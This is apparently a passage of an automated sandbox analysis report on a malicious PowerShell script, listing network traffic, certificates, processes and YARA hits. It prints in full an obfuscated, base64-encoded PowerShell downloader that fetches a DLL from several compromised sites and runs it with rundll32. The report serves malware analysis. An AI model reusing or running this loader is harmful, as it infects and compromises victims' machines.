                                              May 18, 2021 15:54:18.148802042 CEST1640INData Raw: 64 6f 67 2e 63 6f 6d 2f 22 20 63 6c 61 73 73 3d 22 22 20 3e 0a 09 09 09 09 09 09 09 09 09 45 6e 67 6c 69 73 68 0a 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 2f 0a 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 36 63 63
                                              Data Ascii: dog.com/" class="" >English</a>/<a data-v-6ccbd8c6="" href="http://etdog.com/" class="active"></a></div><a data-v-6ccbd8c6="" href="/" class="ftLogo"><img d
                                              May 18, 2021 15:54:18.148828030 CEST1642INData Raw: 95 99 e8 a8 80 2f 27 29 22 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 39 65 38 65 30 37 66 30 3d 22 22 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 70 20 64 61 74 61 2d 76 2d 39 65 38 65 30 37 66 30 3d 22 22
                                              Data Ascii: /')"><div data-v-9e8e07f0=""></div><p data-v-9e8e07f0=""></p></li><li data-v-9e8e07f0="" class="box_code"><div data-v-9e8e07f0=""></div><p data-v-9e8e07f0=""


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.349739143.204.98.6480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              May 18, 2021 15:54:18.966902018 CEST1687OUTGET /paypal/b8G/ HTTP/1.1
                                              Host: www.stmarouns.nsw.edu.au
                                              Connection: Keep-Alive
                                              May 18, 2021 15:54:19.010704041 CEST1688INHTTP/1.1 301 Moved Permanently
                                              Server: CloudFront
                                              Date: Tue, 18 May 2021 13:54:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 183
                                              Connection: keep-alive
                                              Location: https://www.stmarouns.nsw.edu.au/paypal/b8G/
                                              X-Cache: Redirect from cloudfront
                                              Via: 1.1 9128c49d19c76fd86ec4c647434ccb0a.cloudfront.net (CloudFront)
                                              X-Amz-Cf-Pop: FRA50-C1
                                              X-Amz-Cf-Id: 66Zh7svNLv4LB1S0pqWi3BVNh2F8WIe7yWj5SVxFudpHmZS6j5LYyQ==
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.349741159.65.89.22280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              May 18, 2021 15:54:20.060494900 CEST1697OUTGET /content/6F2gd/ HTTP/1.1
                                              Host: wm.mcdevelop.net
                                              Connection: Keep-Alive
                                              May 18, 2021 15:54:20.119771004 CEST1698INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Tue, 18 May 2021 13:54:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 153
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                              HTTPS Packets

                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              May 18, 2021 15:53:59.484607935 CEST35.214.199.246443192.168.2.349733CN=mikegeerinck.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USSat May 08 02:30:43 CEST 2021 Fri Sep 04 02:00:00 CEST 2020Fri Aug 06 02:30:43 CEST 2021 Mon Sep 15 18:00:00 CEST 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                              CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025
                                              May 18, 2021 15:54:18.328510046 CEST172.67.223.27443192.168.2.349738CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESun Apr 25 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Mon Apr 25 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                              May 18, 2021 15:54:19.203941107 CEST143.204.98.64443192.168.2.349740CN=stmarouns.nsw.edu.au CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USFri Feb 12 01:00:00 CET 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Mon Mar 14 00:59:59 CET 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                              CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                              CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                              CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: powershell.exe PID: 5496 Parent PID: 5792

                                              General

                                              Start time:15:53:31
                                              Start date:18/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1'
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmp, Author: Florian Roth
                                              • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: conhost.exe PID: 5624 Parent PID: 5496

                                              General

                                              Start time:15:53:31
                                              Start date:18/05/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6b2800000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: powershell.exe PID: 5344 Parent PID: 5496

                                              General

                                              Start time:15:53:33
                                              Start date:18/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAnAC0AYgBpAG4AJwArACcALwBTACcAKQArACgAJwAvACcAKwAnAEAAJwArACcAXQBhAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoALwAvACcAKwAnAGUAdABkAG8AZwAuAGMAbwAnACsAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG4AJwArACcAdQAvAEAAJwApACsAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACcAcwAnACsAKAAnADoALwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AaABpAG4AdAB1ACcAKwAnAHAALgBjACcAKQArACgAJwBvACcAKwAnAG0ALgAnACkAKwAoACcAYgAnACsAJwByAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGMAbwAnACkAKwAoACcAbgAnACsAJwB0AGUAbgAnACkAKwAoACcAdAAnACsAJwAvAGQARQAvACcAKwAnAEAAXQBhACcAKwAnAG4AdwBbADMAOgAvAC8AJwArACcAdwB3AHcALgAnACkAKwAnAHMAJwArACgAJwB0AG0AJwArACcAYQByAG8AdQBuAHMAJwArACcALgAnACkAKwAoACcAbgBzACcAKwAnAHcAJwApACsAKAAnAC4AJwArACcAZQBkAHUALgBhAHUALwBwACcAKwAnAGEAJwArACcAeQAnACsAJwBwAGEAbAAvAGIAOAAnACkAKwAoACcARwAnACsAJwAvAEAAXQAnACkAKwAoACcAYQAnACsAJwBuAHcAWwAnACkAKwAoACcAMwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwBtAC4AbQBjAGQAZQB2AGUAJwArACcAbABvAHAALgBuAGUAdAAnACsAJwAvACcAKwAnAGMAJwArACcAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAJwA2ACcAKwAoACcARgAyACcAKwAnAGcAZAAvACcAKQApAC4AIgBSAEUAYABwAGAAbABBAEMAZQAiACgAKAAoACcAXQBhACcAKwAnAG4AJwApACsAKAAnAHcAJwArACcAWwAzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAFAATABJAFQAIgAoACQAQwA4ADMAUgAgACsAIAAkAEMAdgBtAG0AcQA0AG8AIAArACAAJABGADEAMABRACkAOwAkAFEANQAyAE0APQAoACcAUAAnACsAKAAnADAAJwArACcANQBLACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABCAG0ANQBwAHcANgB6ACAAaQBuACAAJABCADkAZgBoAGIAeQB2ACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABTAHkAcwBUAGUAbQAuAG4ARQB0AC4AVwBFAEIAYwBMAEkAZQBOAFQAKQAuACIAZABvAGAAVwBOAGwAYABPAGEARABgAEYASQBsAEUAIgAoACQAQgBtADUAcAB3ADYAegAsACAAJABJAG0AZAAxAHkAYwBrACkAOwAkAFoAMQAwAEwAPQAoACcAQQA5ACcAKwAnADIAUQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASQBtAGQAMQB5AGMAawApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwA1ADYAOQA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEkAbQBkADEAeQBjAGsALAAoACgAJwBDAG8AJwArACcAbgB0ACcAKQArACcAcgAnACsAKAAnAG8AbAAnACsAJwBfAFIAdQBuAEQAJwArACcATAAnACkAKwAnAEwAJwApAC4AIgBUAGAATwBTAHQAYABSAGkATgBHACIAKAApADsAJABSADYANQBJAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAQgAnACkAKQA7AGIAcgBlAGEAawA7ACQASwA3AF8ASAA9ACgAJwBGADEAJwArACcAMgBVACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwA1ADQASQA9ACgAKAAnAFYAOQAnACsAJwA1ACcAKQArACcATwAnACkA
                                              Imagebase:0x7ff785e30000
                                              File size:447488 bytes
                                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: powershell.exe PID: 5496 Parent PID: 5792 powershell.exeCOMMON

                                                Executed Functions

                                                Function 00007FFAEEA31355, Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.335238200.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                • Instruction ID: 119bc363d1f8bdf002a9a1faab3150fb5729403b090a2b7161c297bbb8e72b88
                                                • Opcode Fuzzy Hash: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                                • Instruction Fuzzy Hash: B301677125CB0C8FD784EF0CE491AA6B7E0FB95324F50056DE58AC3651DA36E881CB46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Analysis Process: powershell.exe PID: 5344 Parent PID: 5496 powershell.exeCOMMON

                                                Executed Functions

                                                Function 00007FFAEEB03D0A, Relevance: 6.8, Strings: 5, Instructions: 513COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T_L;$gM$gM$gM$gM
                                                • API String ID: 0-3996976133
                                                • Opcode ID: 46dc370316cf5ff7997cdfd6dd3576b14f23f1d63de8962816f01b4a2a6fd442
                                                • Instruction ID: ad87138d10600951533c613c87f70a1283165619e871a81e6c333add3849ca0e
                                                • Opcode Fuzzy Hash: 46dc370316cf5ff7997cdfd6dd3576b14f23f1d63de8962816f01b4a2a6fd442
                                                • Instruction Fuzzy Hash: E4F1F77190DBC64FE396A72998A92B47FA1EF57210B0AC1FED08DCB1D3D958AC058352
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEB03E94, Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: gM$gM
                                                • API String ID: 0-891327762
                                                • Opcode ID: 4790af30431984823b21c7d28347f615de33560ebab50016dff9921e10b5358e
                                                • Instruction ID: a3ab1246dc65cd66d6b9bf29006a11545f26715fcab6b166e88180e39709019f
                                                • Opcode Fuzzy Hash: 4790af30431984823b21c7d28347f615de33560ebab50016dff9921e10b5358e
                                                • Instruction Fuzzy Hash: A8212772A0CB4A8FE3A5A72DA8A927477D2EF92210749C1FAE04DC7293DD59BC054342
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA34493, Relevance: 1.8, Strings: 1, Instructions: 526COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: gc_H
                                                • API String ID: 0-2281762278
                                                • Opcode ID: a720546c4a5441ccd819c56f507003ab07a9f6dd60d3af482050543ac465d5d0
                                                • Instruction ID: 91ff158dd2fc2663adb91ddde547551d5bbbae6dea6caae63dc44dabfe8819e5
                                                • Opcode Fuzzy Hash: a720546c4a5441ccd819c56f507003ab07a9f6dd60d3af482050543ac465d5d0
                                                • Instruction Fuzzy Hash: 52F1BF30A1CA498FDB98EF5CC495AA97BE1FF69301F1541AED00DD7296CA74EC81CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEB01835, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: gM
                                                • API String ID: 0-3674513331
                                                • Opcode ID: bbe64f81e2aff38ac90f8b05f464459ea0ea1bc53bf699443a532b14e77dc218
                                                • Instruction ID: 1c98204cf428878a9dd17a3185fe955cd3b99315b8c45ec04921cd847377a6ff
                                                • Opcode Fuzzy Hash: bbe64f81e2aff38ac90f8b05f464459ea0ea1bc53bf699443a532b14e77dc218
                                                • Instruction Fuzzy Hash: ACF0C232F0CF1A0AF6EAE75C55653B8B1C2DF99620B8AC1FBD50DD3283DD08AD150282
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA3312B, Relevance: .5, Instructions: 545COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e59e4515b65a14540f4084c4cc7335c1db714f8d30ed6464cb02386bf478cf0b
                                                • Instruction ID: 0a8817ab22d91ec429685909f6382257a158eae67e15ca2c110c26af653bd5c9
                                                • Opcode Fuzzy Hash: e59e4515b65a14540f4084c4cc7335c1db714f8d30ed6464cb02386bf478cf0b
                                                • Instruction Fuzzy Hash: 1702F230A1CA498FDB88EF1CC485AA9BBE1FF69311F15426ED40DC7296CA74E845CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA33BF5, Relevance: .5, Instructions: 458COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cee340d43fa4ae7a057387c0d2aae10885af098e0b48d29717a848daf9442cfb
                                                • Instruction ID: c005ff0a66af4dff1a673651c242ceefba49f3d6c22353bb9b4ecfa070240de9
                                                • Opcode Fuzzy Hash: cee340d43fa4ae7a057387c0d2aae10885af098e0b48d29717a848daf9442cfb
                                                • Instruction Fuzzy Hash: 21E1B030A1CA4D8FDB94EF5CC485AADBBE1FF69701F1581AAD00DC7296CA74E885C781
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEB02AB2, Relevance: .1, Instructions: 118COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327819592.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeeb00000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d5edaa95ee2aa7f536c3441ed69968d6030fb6d2e2c0ee9f3b10f2460a0d98f
                                                • Instruction ID: d91afa81b46d5ca060480066dddcccd26efdb792450b8f362adf79e3ad9d5951
                                                • Opcode Fuzzy Hash: 5d5edaa95ee2aa7f536c3441ed69968d6030fb6d2e2c0ee9f3b10f2460a0d98f
                                                • Instruction Fuzzy Hash: 5C31FC72B0CA568FE798AF1CE8526B577D1EB95760B14807FE04DC3293DD25AC0683C2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA32C94, Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2159113e4841d2009e4974ad3551eb3772fd05b500ed3a54ebe8f04f51121ab0
